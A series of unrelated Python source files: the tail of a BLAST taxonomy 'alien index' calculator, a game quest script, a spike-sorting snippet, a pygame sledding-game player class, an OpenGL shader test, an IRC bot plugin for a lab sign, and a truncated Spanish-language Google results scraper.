results = parseTaxonomy(taxon, outgroupList, ingroupList, ignoregroupList)
# results == [queryName, ingroupCount, outgroupCount, missingCount, focalTipsPresent]
sumResults = results[1] + results[2] + results[3] + results[4]
if results[1] == 1:
ingroupFound = True
elif results[2] == 1:
outgroupFound = True
elif results[3] == 1:
ignoregroupFound = True
elif results[4] == 1:
missingGroup = True
else:
staxon2 = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
try:
staxon2.remove("0")
except:
pass
uniqstaxon2 = list(filter(None, [y for y in set(staxon2)]))
try:
uniqstaxon2.remove("0")
except:
pass
for taxon2 in uniqstaxon2:
if taxon2 in nodesDictNamesList:
results2 = parseTaxonomy(taxon2, outgroupList, ingroupList, ignoregroupList)
sumResults = results2[1] + results2[2] + results2[3] + results2[4]
if results2[1] == 1:
ingroupFound = True
elif results2[2] == 1:
outgroupFound = True
elif results2[3] == 1:
ignoregroupFound = True
elif results[4] == 1:
missingGroup = True
if ingroupFound == False and outgroupFound == False: # don't do anything, assuming query falls in gap between ingroup and outgroup or in ignoregroup
pass
elif ingroupFound == True and outgroupFound == False and ignoregroupFound == False or uniqstaxon[0] == "N/A" and missingData == "ingroup":
mainDict[qseqid]["numIngroup"] += 1
try:
previousBBHG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10] # retrieve evalue of best ingroup hit stored in dictionary for qseqid
if evalue > previousBBHG:
mainDict[qseqid]["bestBlastHitIngroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitIngroup" : line})
except:
mainDict[qseqid] = {"bestBlastHitIngroup" : line}
elif ingroupFound == False and outgroupFound == True and ignoregroupFound == False or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
elif sumResults > 1: # catch errors where both multiple groups are found in the same BLAST line
print("WARNING: Multiple group names found. Check your groups are mutually exclusive in NCBI taxonomy. Offending taxon list: %s" % uniqstaxon , file=sys.stderr)
# subsection if only standard taxon searching needed
else:
# set 'staxon' as the element to compare to ingroup name if --taxon is set
if 'taxonRank' in locals():
if taxonRank == "superkingdom":
staxon = [x for x in line.strip("\n").split("\t")[13].split(";") if x != 0]
elif taxonRank == "kingdom":
staxon = [x for x in line.strip("\n").split("\t")[14].split(";") if x != 0]
elif taxonRank == "phylum":
staxon = [x for x in line.strip("\n").split("\t")[15].split(";") if x != 0]
elif taxonRank == "genus":
staxon = [line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0]]
try:
staxon.remove("0")
except:
pass
# set 'staxon' to all taxonomy fields if not specified in command line
else:
staxon = []
for x in line.strip("\n").split("\t")[13:16]:
try:
templist = [y for y in x.split(";") if y != 0]
for z in templist:
staxon.append(z)
except:
staxon.append(x)
staxon.append(line.strip("\n").split("\t")[16].split(" ")[0].split(";")[0])
uniqstaxon = list(filter(None, [y for y in set(staxon)]))
try:
uniqstaxon.remove("0")
except:
pass
# Compare evalue from current line to previous dictionary entry for ingroup/outgroup, replace with line if previous evalue lower than current
if ingroup.lower() in [j.lower() for j in staxon] and len(set(staxon)&set(ignoregroupList)) == 0 or uniqstaxon[0] == "N/A" and missingData == "ingroup":
mainDict[qseqid]["numIngroup"] += 1
try:
previousBBHG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10] # retrieve evalue of best ingroup hit stored in dictionary for qseqid
if evalue > previousBBHG:
mainDict[qseqid]["bestBlastHitIngroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitIngroup" : line})
except:
mainDict[qseqid] = {"bestBlastHitIngroup" : line}
elif len(outgroupList) >= 1:
if len(set(staxon)&set(outgroupList)) >= 1 or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
else:
continue
elif len(outgroupList) == 0:
if ingroup.lower() not in [j.lower() for j in staxon] or uniqstaxon[0] == "N/A" and missingData == "outgroup":
mainDict[qseqid]["numOutgroup"] += 1
try:
previousBBHO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10] # retrieve evalue of best outgroup hit stored in dictionary for qseqid
if evalue > previousBBHO:
mainDict[qseqid]["bestBlastHitOutgroup"] = line
except KeyError: # if no previous entry in dictionary
try:
mainDict[qseqid].update({"bestBlastHitOutgroup" : line})
except KeyError:
mainDict[qseqid] = {"bestBlastHitOutgroup" : line}
# Debugging precaution
#else:
# print("This shouldn't happen - error comparing ingroup to staxon")
# print("Ingroup: %s , staxon: %s" %(ingroup, staxon))
# print(line)
# exit(1)
# Calculate AI and write to file or screen
if 'outfile' in locals():
with open(outfile, 'w') as openOutfile:
openOutfile.write("#QueryID\tNumber-Ingroup\tNumber-Outgroup\tPercent-Ingroup\tPercent-Outgroup\tBestBlastHit-Ingroup\tBestBlastHit-Outgroup\tAlienIndex\n")
for qseqid in mainDict:
numIngroup = mainDict[qseqid]["numIngroup"]
numOutgroup = mainDict[qseqid]["numOutgroup"]
if numIngroup == 0 and numOutgroup == 0:
percIngroup = 0
percOutgroup = 0
else:
percIngroup = 100 * numIngroup / (numIngroup + numOutgroup)
percOutgroup = 100 * numOutgroup / (numIngroup + numOutgroup)
try:
bbhG = float(mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10])
#taxG = mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[13:16]
except KeyError:
bbhG = 1
#taxG = "No hit"
try:
bbhO = float(mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10])
#taxO = mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[13:16]
except KeyError:
bbhO = 1
#taxO = "No hit"
AI = (np.log(bbhG + (1*10e-200)))-(np.log(bbhO + (1*10e-200)))
mainDict[qseqid].update({"AI" : AI}) # add AI to main dictionary in case I want to use later
openOutfile.write("%s\t%d\t%d\t%0.2f\t%0.2f\t%s\t%s\t%0.2f\n" %(qseqid, int(mainDict[qseqid]["numIngroup"]), int(mainDict[qseqid]["numOutgroup"]), percIngroup, percOutgroup, bbhG, bbhO, AI))
else:
print("#QueryID\tNumber-Ingroup\tNumber-Outgroup\tPercent-Ingroup\tPercent-Outgroup\tBestBlastHit-Ingroup\tBestBlastHit-Outgroup\tAlienIndex")
for qseqid in mainDict:
numIngroup = mainDict[qseqid]["numIngroup"]
numOutgroup = mainDict[qseqid]["numOutgroup"]
if numIngroup == 0 and numOutgroup == 0:
percIngroup = 0
percOutgroup = 0
else:
percIngroup = 100 * numIngroup / (numIngroup + numOutgroup)
percOutgroup = 100 * numOutgroup / (numIngroup + numOutgroup)
try:
bbhG = float(mainDict[qseqid]["bestBlastHitIngroup"].split("\t")[10])
except KeyError:
bbhG = 1
try:
bbhO = float(mainDict[qseqid]["bestBlastHitOutgroup"].split("\t")[10])
except KeyError:
bbhO = 1
AI = (np.log(bbhG + (1*10e-200)))-(np.log(bbhO + (1*10e-200)))
mainDict[qseqid].update({"AI" : AI}) # add AI to main dictionary in case I want to use later
try:
print("%s\t%d\t%d\t%0.2f\t%0.2f\t%s\t%s\t%0.2f" %(qseqid, int(mainDict[qseqid]["numIngroup"]), int(mainDict[qseqid]["numOutgroup"]), percIngroup, percOutgroup, bbhG, bbhO, AI))
except:
pass
if 'logfileName' in locals():
logfile.close()
|
#23212 | Contract with Mastema
sm.setSpeakerID(2450017)
if sm.sendAskYesNo("Everything is ready. Let us begin the contract ritual. Focus on your mind."):
sm.setJob(3110)
sm.addSP(5)
sm.completeQuest(parentID)
sm.setPlayerAsSpeaker()
sm.sendNext("#b(You feel a curious energy flowing into you.)")
sm.setSpeakerID(2450017)
sm.sendNext("There... our contract is made. Now we can communicate through our minds. Isn't that neat?")
sm.dispose()
else:
sm.dispose()
|
import logging
import yass
from yass import preprocess
from yass import process
# configure logging module to get useful information
logging.basicConfig(level=logging.DEBUG)
# set yass configuration parameters
yass.set_config('config_sample.yaml')
# run preprocessor
score, clr_idx, spt = preprocess.run()
# run processor
(spike_train_clear, templates,
spike_index_collision) = process.run(score, clr_idx, spt)
|
import pygame
import load
from locals import *
from physics import *
from entity import Entity
from ice import Ice
from rock import Rock
from score import Score
from math import sin, cos, pi
def init():
Player.image = load.load_image("sledder")
def drawMessage(screen):
msgNum = 0
messages = ["SMASHED INTO ROCK!", "JUMPED OVER ROCK!", "SUCCESSFUL TRICK!"]
font = load.load_font("FuturaT_Bold", 20)
for i in range(len(Player.msgBools)):
if Player.msgBools[i]:
msgNum += 1
msg = font.render(messages[i], True, (127, 178, 215))
screen.blit(msg, (SCREEN_WIDTH - 250,
SCREEN_HEIGHT - 50 - msgNum * 35))
# if multiple messages have to be blitted
msgNum = 0
class Player(Entity):
image = None
grav = 1.1
acc = 0.5
iceAcc = 0.2
trickAcc = 1
msgBools = [False, False, False] # rockSmash, rockJump, didTrick
pWidth = 1024
cameraY = 300
def __init__(self):
super().__init__()
if not Player.image:
player.init()
self.image = Player.image
self.image.convert_alpha()
self.dx, self.dy = 0, 9
self.angle = 0
self.onGround = False
self.hitmask = pygame.surfarray.array_alpha(self.image)
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
self.width = self.image.get_width()
self.height = self.image.get_height()
self.doingTrick = self.rotating = False
self.crashed = self.tooSteep = self.willCrash = False
self.up = False
self.falling = True
self.groundSpeed = 12
self.message = None
self.score = 5 # score multiplier
self.blitCount = 0
def update(self, platforms, ice=None, rock=None):
if self.groundSpeed >= 18: # function for calibrating speed
dec = 0.013 * self.groundSpeed - .22
self.groundSpeed -= dec
if Player.msgBools[0] or Player.msgBools[1] or Player.msgBools[2]:
self.blitCount += 1
else:
self.blitCount = None
if self.onGround:
if self.willCrash:
self.tooSteep = True
self.falling = False
if 0 < self.angle % 360 < 90: # going uphill
self.groundSpeed -= (Player.acc *
abs(sin(radians(self.angle))))
else:
if self.groundSpeed <= 25:
self.groundSpeed += (Player.acc *
abs(sin(radians(self.angle))))
self.dx = self.groundSpeed * cos(radians(self.angle))
self.dy = self.groundSpeed * -sin(radians(self.angle))
if self.rotating:
self.updateAngle(self.angle + 20)
if not self.onGround:
self.dy += Player.grav
self.makeLegalXMove(self.dx,
platforms[self.rect.right // Player.pWidth], platforms)
self.collide(self.dx, 0, platforms)
if self.up and not self.falling:
self.dy = (-12)
self.falling = True
self.makeLegalYMove(self.dy,
platforms[self.rect.right // Player.pWidth], platforms)
self.collide(0, self.dy, platforms)
self.icerockCollision(platforms, ice, rock)
if self.blitCount == 20:
Player.msgBools[0] = Player.msgBools[
1] = Player.msgBools[2] = False
if self.onGround and (240 < self.angle % 360 < 300
or 90 < self.angle % 360 < 180):
self.tooSteep = True
return self.groundSpeed
def makeLegalXMove(self, move, platform, platforms, depth=0):
# makes a legal move in the x direction depending on player's position
# relative to the slope
p = platform
x = self.rect.left
x += move # make the move
result = self.isLegalX(x, p, platforms)
if result == True:
# make the move to the player rect
self.rect.left += move
else:
# offset by how much the player would overlap and make the move
target1 = result
self.rect.left, self.rect.top = \
self.rect.left + move, self.rect.top - target1
def isLegalX(self, x, p, platforms):
'''calculates if move is legal; if not, returns how much the player
overlaps a legal move is defined as the player's bottom being at the
height of the platform'''
x0 = int(x % Player.pWidth) # left most point
x1 = (int((x0 + self.width * (sin(radians(self.angle)))
+ self.width * (cos(radians(self.angle)))) % Player.pWidth))
platformY0 = \
(platforms[self.rect.right // Player.pWidth].outlineList[x0][1])
# corresponding platform height
if self.rect.right % Player.pWidth <= Player.pWidth - self.width:
platformY1 = \
platforms[self.rect.right // Player.pWidth].outlineList[x1][1]
else:
# use next platform
platformY1 = \
platforms[self.rect.right //
Player.pWidth + 1].outlineList[x1][1]
bottom0 = (self.rect.top - Player.cameraY
+ self.width * (sin(radians(self.angle)))
+ self.width * (cos(radians(self.angle))))
bottom1 = (self.rect.top - Player.cameraY
+ self.width * cos(radians(self.angle)))
if platformY1 >= bottom1 and platformY0 >= bottom0:
# should always be above slope curve
return True
else:
targetAngle = getAngle((platformY1 - platformY0), self.rect.width)
if not self.doingTrick:
self.updateAngle(targetAngle)
target1 = bottom1 - platformY1
return target1
def makeLegalYMove(self, move, platform, platforms, depth=0):
p = platform
y = self.rect.top
y += move # make the move
result = self.isLegalY(y, p, platforms)
if result[0]:
self.rect.top += move
return
else:
target1 = result[2]
self.rect.top += math.floor(move - abs(target1)) # correction
def isLegalY(self, y, p, platforms):
x0 = self.rect.left % Player.pWidth # left most point
x1 = self.rect.right % Player.pWidth # right most point
currPlat = self.rect.right // Player.pWidth
platformY0 = platforms[currPlat].outlineList[x0][1]
platformY1 = platforms[currPlat].outlineList[x1][1]
top = y
bottom0 = (top - Player.cameraY
+ self.width * (sin(radians(self.angle)))
+ self.width * (cos(radians(self.angle))))
bottom1 = (top - Player.cameraY + self.width *
cos(radians(self.angle)))
if platformY1 >= bottom1: # should always be above slope curve
return (True, None, None)
else:
prevAngle = self.angle % 360
targetAngle = getAngle(
(platformY1 - platformY0), self.rect.width) % 360
if (abs(self.angle - targetAngle) <= 30 or
abs(self.angle + 360 - targetAngle) <= 30 or
abs(self.angle - targetAngle - 360) <= 30):
pass
else:
if not self.doingTrick:
print("Too steep", prevAngle, targetAngle)
self.willCrash = True
if not self.doingTrick:
self.updateAngle(targetAngle)
target0 = bottom0 - platformY0
target1 = bottom1 - platformY1
return (False, target0, target1)
def updateAngle(self, angle):
# updates player angle and rotates original image based on the angle
self.angle = angle
self.image = pygame.transform.rotate(Player.image, angle)
self.rect.width = self.image.get_width()
self.rect.height = self.image.get_height()
self.hitmask = pygame.surfarray.array_alpha(self.image)
def isUphill(self, p):
x0, x1 = self.rect.left % Player.pWidth, \
self.rect.right % Player.pWidth
y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
return (y1 < y0)
def collide(self, dx, dy, platforms):
p = platforms[self.rect.right // Player.pWidth]
if pixelPerfectCollision(self, p) != None:
# collision occurred
self.onGround = True
self.dy = 0
if self.isUphill(p):
y0, y1 = self.calculateUphill(p)
else:
y0, y1 = self.calculateDownhill(p)
yOverlap = pixelPerfectCollision(self, p)[0]
xOverlap = pixelPerfectCollision(self, p)[1]
third = pixelPerfectCollision(self, p)[2]
targetAngle = getAngle((y1 - y0), self.rect.width)
if self.doingTrick:
if self.angle > 360:
calcAngle = self.angle % 360
else:
calcAngle = self.angle
if (abs(targetAngle - calcAngle) <= 25 or
abs(targetAngle + 360 - calcAngle) <= 25 or
abs(targetAngle - calcAngle - 360) <= 25):
# allows for some inaccuracy, takes edge cases into account
self.blitCount = 0
Player.msgBools[2] = True
# successful trick!
scoreMultiple = self.angle // 360 + 0.5
self.score += int(3 * scoreMultiple)
self.groundSpeed += Player.trickAcc # speed up
self.doingTrick = False
else: # crashed
print("Aiming for", targetAngle, "but", calcAngle)
self.crashed = True
if not self.doingTrick:
self.updateAngle(targetAngle)
else:
self.onGround = False
def calculateUphill(self, p):
# returns slope height at player's position going uphill
x0, x1 = self.rect.left % Player.pWidth, \
self.rect.right % Player.pWidth
y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
return (y0, y1)
def calculateDownhill(self, p):
# returns slope height at player's position going downhill
a = self.angle
x0 = (int(self.rect.right % Player.pWidth
- (self.width * sin(a * pi / 180)) - self.width) % Player.pWidth)
x1 = (int(self.rect.right % Player.pWidth
- (self.width * sin(a * pi / 180))) % Player.pWidth)
y0, y1 = p.outlineList[x0][1], p.outlineList[x1][1]
return (y0, y1)
def icerockCollision(self, platforms, ice, rock):
self.currPlat = platforms[self.rect.right // Player.pWidth]
if (ice[self.currPlat][0][0] <= (self.rect.centerx % Player.pWidth)
<= ice[self.currPlat][-1][0]):
if not self.falling:
# speed increases when colliding with ice
self.groundSpeed += Player.iceAcc
# rock pixel collision
for r in rock:
leftRockEdge = r.rect.x
if pixelPerfectCollision(self, r) != None:
if self.groundSpeed < 20: # different from scarf
self.crashed = True
else: # can smash into rocks at speeds greater than 20
self.blitCount = 0
Player.msgBools[0] = True
n = 0
while n < 3:
r.explode(n)
n += 1
elif (0 <= self.rect.right % Player.pWidth - leftRockEdge <= 20
and self.falling):
# jumped over rock
self.blitCount = 0
Player.msgBools[1] = True
def getScore(self):
return self.score
def moveUp(self, bool):
if bool:
self.up = True
else:
self.up = False
def rotate(self, bool):
if bool and self.falling:
self.rotating = True
self.doingTrick = True
else:
self.rotating = False
|
"""The geometry shader should populate the feedback buffer with
vertex indices. However, it only does this if both EmitVertex calls
are commented out."""
NUM_NODES = 6
import numpy as np
from OpenGL.GL import *
from PyQt4 import QtCore, QtGui, QtOpenGL
VS = """#version 440
in vec4 position;
out VSOUT
{
vec4 gl_Position;
int index;
} vsout;
uniform mat4 gl_ModelViewMatrix;
void main()
{
gl_Position = gl_ModelViewMatrix * position;
vsout.index = gl_VertexID;
vsout.gl_Position = gl_Position;
}
"""
GS = """#version 440
#extension GL_ARB_shader_storage_buffer_object : enable
layout (lines) in;
layout (line_strip) out;
in VSOUT{
vec4 gl_Position;
int index;
} vdata[];
layout (std430, binding=0) buffer FeedbackBuffer{
vec2 fb[];
};
void main()
{
int i = vdata[0].index;
int j = vdata[1].index;
fb[gl_PrimitiveIDIn ][0] = vdata[0].index;
fb[gl_PrimitiveIDIn ][1] = vdata[1].index;
gl_Position = gl_in[0].gl_Position;
EmitVertex();
gl_Position = gl_in[1].gl_Position;
EmitVertex();
}
"""
FS = """#version 440
out vec4 outputColor;
void main()
{
outputColor = vec4(.5,.5,.5,.5);
}
"""
class GeomTestWidget(QtOpenGL.QGLWidget):
def initializeGL(self):
glViewport(0, 0, self.width(), self.height())
glEnable(GL_PROGRAM_POINT_SIZE)
glEnable(GL_POINT_SMOOTH)
self.shaderProgram = QtOpenGL.QGLShaderProgram(self)
self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Vertex, VS)
self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Geometry, GS)
self.shaderProgram.addShaderFromSourceCode(QtOpenGL.QGLShader.Fragment, FS)
self.shaderProgram.link()
self.pr_matrix = [1., 0., 0., -.0 ,
0., 1., 0., -.0,
0., 0., 1., 0.,
-.5, -.5, 0., 1.]
# random points and edges
self.positions = np.random.random((NUM_NODES, 2))
self.fbBuffer = glGenBuffers(1)
glBindBuffer(GL_SHADER_STORAGE_BUFFER, self.fbBuffer)
self.fb = np.zeros((NUM_NODES,2), dtype=np.float32)
glBufferData(GL_SHADER_STORAGE_BUFFER, self.fb.nbytes, self.fb, GL_DYNAMIC_COPY)
glBindBufferBase(GL_SHADER_STORAGE_BUFFER, 0, self.fbBuffer)
glMemoryBarrier(GL_SHADER_STORAGE_BARRIER_BIT)
def keyPressEvent(self, event):
key = event.key()
handled = True
if key in (QtCore.Qt.Key_Space,):
self.getfb()
else:
handled = False
if handled:
self.updateGL()
else:
event.ignore()
def getfb(self, init=False):
glBindBuffer(GL_SHADER_STORAGE_BUFFER, self.fbBuffer)
glMemoryBarrier(GL_SHADER_STORAGE_BARRIER_BIT)
glGetBufferSubData(GL_SHADER_STORAGE_BUFFER, 0, self.fb.nbytes, self.fb)
print self.fb
def paintGL(self):
glClearColor(0., 0., 0., 1.)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_MODELVIEW)
glLoadMatrixf(self.pr_matrix)
self.shaderProgram.bind()
self.shaderProgram.setAttributeArray("position", self.positions)
self.shaderProgram.setUniformValue("NUM_NODES", NUM_NODES)
self.shaderProgram.enableAttributeArray("position")
# draw nodes
#glDrawArrays(GL_POINTS, 0, NUM_NODES)
# draw edges
edges = [0,1,0,2,2,3,2,4]
glDrawElements(GL_LINES, len(edges), GL_UNSIGNED_INT, edges)
self.shaderProgram.release()
def resizeGL(self, width, height):
glViewport(0, 0, self.width(), self.height())
def main():
import sys
app = QtGui.QApplication(sys.argv)
glformat = QtOpenGL.QGLFormat()
glformat.setProfile(QtOpenGL.QGLFormat.CoreProfile)
#glformat.setVersion(4, 0)
w = GeomTestWidget(glformat)
w.resize(640, 480)
w.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main() |
###
# Copyright (c) 2009, paulv
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.ircdb as ircdb
import urllib
class HacklabSign(callbacks.Plugin):
""" Provides access to the sign in the lab
"""
threaded = True
def sign(self, irc, msg, args, text):
"""<message>
echos <message> to the sign
"""
message = format ("%s:\n%s", msg.nick, text)
urlbase = "http://192.168.111.4:8080/SignService?"
urlargs = urllib.urlencode({ "Action" : "ShowMessage", "FontSize" : 10, "Version" : "2009-02-03", "Message" : message })
url = format("%s%s", urlbase, urlargs)
handle = utils.web.getUrl(url)
irc.noReply()
sign = wrap(sign, ["text"])
Class = HacklabSign
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
from mechanize import Browser
from bs4 import BeautifulSoup
import timeit
import unicodedata
import encodings
import os,sys
busc=raw_input('QUE DESEAS BUSCAR?'+'\n')
inicio1=timeit.default_timer()
print 'BUSCANDO EN GOOGLE ........'+'\n'
if busc=='pythan':
obag='.python'
else:
obag=busc
if busc=='pythen':
obag='.python'
if busc=='pythin':
obag='.python'
if busc=='python':
obag='.python'
if busc=='pythun':
obag='.python'
br = Browser()
br.set_handle_robots( False )
br.addheaders = [('User-agent', 'Chrome')]
br.open( "http://google.com" )
br.select_form( 'f' )
br.form[ 'q' ] = obag
br.submit()
b=''
for b1 in obag:
if b1==' ':
b=b+'+'
else:
b=b+b1
principal=''
soup = BeautifulSoup(br.response().read())
for i,link in enumerate(soup.find_all('a')):
principal=principal+(str(link.get('href'))+'\n')
duno=0
for x in principal:
if x=='\n':
duno=duno+1
d0=0
google=''
for x in principal:
if x=='\n':
d0=d0+1
if d0==18 and x!='\n':
google=google+x
if d0==19:
break
googlelink1=google
google=''
d0=0
dun=duno-18
for y1 in principal:
if y1=='\n':
d0=d0+1
if d0==dun and y1!='\n':
google=google+y1
if d0>dun:
break
googlelink2=google
google=''
d0=0
dun=duno-17
for y2 in principal:
if y2=='\n':
d0=d0+1
if d0==dun and y2!='\n':
google=google+y2
if d0>dun:
break
googlelink3=google
google=''
d0=0
dun=duno-16
for y3 in principal:
if y3=='\n':
d0=d0+1
if d0==dun and y3!='\n':
google=google+y3
if d0>dun:
break
googlelink4=google
google=''
d0=0
dun=duno-15
for y4 in principal:
if y4=='\n':
d0=d0+1
if d0==dun and y4!='\n':
google=google+y4
if d0>dun:
break
googlelink5=google
google=''
d0=0
dun=duno-14
for y5 in principal:
if y5=='\n':
d0=d0+1
if d0==dun and y5!='\n':
google=google+y5
if d0>dun:
break
googlelink6=google
google=''
d0=0
dun=duno-13
for y6 in principal:
if y6=='\n':
d0=d0+1
if d0==dun and y6!='\n':
google=google+y6
if d0>dun:
break
googlelink7=google
google=''
d0=0
dun=duno-12
for y7 in principal:
if y7=='\n':
d0=d0+1
if d0==dun and y7!='\n':
google=google+y7
if d0>dun:
break
googlelink8=google
google=''
d0=0
dun=duno-11
for y8 in principal:
if y8=='\n':
d0=d0+1
if d0==dun and y8!='\n':
google=google+y8
if d0>dun:
break
googlelink9=google
google=''
d0=0
dun=duno-10
for y9 in principal:
if y9=='\n':
d0=d0+1
if d0==dun and y9!='\n':
google=google+y9
if d0>dun:
break
googlelink10=google
google=''
d0=0
d1=0
d2=0
d3=0
imgt=''
img=''
for y10 in principal:
if y10=='\n':
d0=d0+1
d1=0
d2=0
if img=='/images?':
googlelinkimg=imgt
d3=1
img=''
imgt=''
else:
img=''
imgt=''
if d0==1 and y10!='\n':
d1=d1+1
img=img+y10
if d1==7 and img=='/images':
imgt=imgt+img
if d1>=8:
d0=0
d2=1
if d2==1:
imgt=imgt+y10
if d3==1:
break
googlepaginas=['']*20
googlepagina1=''
googlepagina2=''
googlepagina3=''
googlepagina4=''
googlepagina5=''
googlepagina6=''
googlepagina7=''
googlepagina8=''
googlepagina9=''
googlepagina10=''
googlepagina11=''
googlepagina12=''
googlepagina13=''
googlepagina14=''
googlepagina15=''
googlepagina16=''
googlepagina17=''
googlepagina18=''
googlepagina19=''
googlepagina20=''
googletitulos=['']*20
googletitulo1=''
googletitulo2=''
googletitulo3=''
googletitulo4=''
googletitulo5=''
googletitulo6=''
googletitulo7=''
googletitulo8=''
googletitulo9=''
googletitulo10=''
googletitulo11=''
googletitulo12=''
googletitulo13=''
googletitulo14=''
googletitulo15=''
googletitulo16=''
googletitulo17=''
googletitulo18=''
googletitulo19=''
googletitulo20=''
googletextos=['']*20
googletextosfin=['']*20
googletexto1=''
googletexto2=''
googletexto3=''
googletexto4=''
googletexto5=''
googletexto6=''
googletexto7=''
googletexto8=''
googletexto9=''
googletexto10=''
googletexto11=''
googletexto12=''
googletexto13=''
googletexto14=''
googletexto15=''
googletexto16=''
googletexto17=''
googletexto18=''
googletexto19=''
googletexto20=''
d=0
filtro=''
br.open("http://google.com"+googlelink1)
soup1 = BeautifulSoup(br.response().read())
for j,hit in enumerate(soup1.findAll(attrs={'class' : 'r'})):
try:
ch=str(hit.a)
comparador=''
cuenta=0
cuenta1=0
for jala in ch:
cuenta=cuenta+1
if jala=='h' and cuenta>4:
for jala1 in ch:
cuenta1=cuenta1+1
if cuenta1 >= cuenta and jala1!='&':
comparador=comparador+jala1
if jala1=='&':
sab1=len(jala1)
for x in range(1,(sab1+1)):
jala1=''
sab2=len(jala)
for x in range(1,(sab2+1)):
jala=''
sab3=len(ch)
for x in range(1,(sab3+1)):
ch=''
break
bender=0
fry=''
if comparador=='':
googlepaginas[d]='-'
d=d+1
for h in str(comparador):
bender=bender+1
fry=fry+h
if bender==4 and fry=='http':
googlepaginas[d]=str(comparador)
d=d+1
break
if bender==5:
googlepaginas[d]='-'
d=d+1
break
comparador=''
except:
pass
harr=''
harr1=0
harr2=''
googlepaginasfin=['']*20
for i in range(0,20):
harr=googlepaginas[i]
for j in harr:
harr2=harr2+j
harr1=harr1+1
if harr2=='http://www.youtube.com' and harr1==22:
googlepaginasfin[i]='-'
harr2=''
harr1=0
break
if harr1==23:
googlepaginasfin[i]=googlepaginas[i]
harr2=''
harr1=0
break
if harr2=='-':
googlepaginasfin[i]='-'
harr2=''
harr1=0
break
print googlepaginasfin[:]
tit=''
num=0
num1=0
tit1=''
tit2=''
control=0
salida=''
ermest=0
sapeo=0
gab=''
for hit in enumerate(soup1.findAll(attrs={'class' : 'r'})):
try:
for x in str(hit):
tit=tit+x
num=num+1
for y in range(1,(num)):
if tit[num-y]=='"':
break
else:
tit1=tit1+tit[num-y]
num1=num1+1
for z in range(1,num1):
tit2=tit2+tit1[num1-z]
may=tit2
for a in may:
if a=='>':
control=1
if a=='<':
control=0
if control==1 and a!='>':
salida=salida+a
pap=0
guarda=''
mmm=''
qqq=unicode('imágene','utf-8')
for go in salida:
pap=pap+1
guarda=guarda+go
if pap==8:
mmm=guarda.lower()
nnn=unicode(mmm,'utf-8')
if nnn==qqq:
gab=gab+str(ermest)
if pap==9:
break
googletitulos[ermest]=str(salida)
ermest=ermest+1
num=0
num1=0
tit=''
tit1=''
tit2=''
salida=''
except:
pass
print '\n'
print googletitulos[:]
print gab
control1=0
salida1=''
branigan=0
for hit in enumerate(soup1.findAll(attrs={'class' : 'st'})):
try:
for c in str(hit):
if c=='>':
control1=1
if c=='<':
control1=0
if control1==1 and c!='>' and c!='<' and c!=')':
salida1=salida1+c
googletextos[branigan]=str(salida1)
